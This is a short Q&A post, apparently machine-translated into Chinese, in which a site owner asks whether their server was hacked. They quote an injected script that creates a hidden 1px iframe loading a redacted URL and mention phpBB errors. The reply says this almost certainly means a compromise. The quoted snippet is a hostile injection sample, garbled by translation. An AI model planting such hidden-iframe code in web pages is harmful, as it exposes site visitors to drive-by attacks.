我的服务器被攻击了吗？

Question

我今天登录了我的服务器，并在我的目录浏览窗口的顶部看到了以下未识别的代码：

document.createElement("iframe");document.body.appendChild(el);el.id (“”)；var el = ="1px";el.scrolling="auto";el.frameBorder="0";el.src = 'myname';el.name =‘myname’；el.style.wide= "1px";el.style.height =“1px”；el.scrolling=“auto”；el.frameBorder=“0”；el.src= "由作者编辑，未知的URL在这里"；

我不承认URL (我已经编辑掉了)。

此外，我的phpBB3留言板顶部有许多phpBB调试和phpBB通知，这对我来说都是新的。此外，论坛代码中的一些链接似乎被垃圾字符破坏了。

没有额外的内容被添加或删除，但这引起了我的主要关注。

我的站点上的每一个页面都受到Apache登录提示的保护，我认为这是足够的保护。

我是被攻击了，还是在暗处跳跃？

Answer 1

不幸的是，一个从神秘URL加载内容的iframe几乎肯定表明了一种妥协。

需要由专家进行非常彻底的调查才能找到漏洞的程度，但对代码进行这样的修改将意味着该设备已被完全破坏。至于下一步要做什么，请阅读这里。